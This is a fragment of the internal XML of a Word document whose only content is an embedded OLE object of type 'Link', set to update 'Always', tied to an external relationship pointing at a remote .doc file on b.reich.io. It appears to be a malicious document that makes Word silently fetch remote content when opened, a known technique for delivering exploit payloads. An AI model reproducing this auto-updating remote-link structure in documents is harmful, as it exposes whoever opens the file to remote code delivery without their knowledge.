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1D1F" w:rsidRDefault="008924C5">
      <w:r>
        <w:object w:dxaOrig="10176" w:dyaOrig="113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08.5pt;height:568.5pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="Word.Template.12" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId6" UpdateMode="Always">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00851D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3BDE"/>
    <w:rsid w:val="00851D1F"/>
    <w:rsid w:val="008924C5"/>
    <w:rsid w:val="00D93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http://b.reich.io/kxrhoy.doc" TargetMode="Externa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2018-02-21T00:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-21T00:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>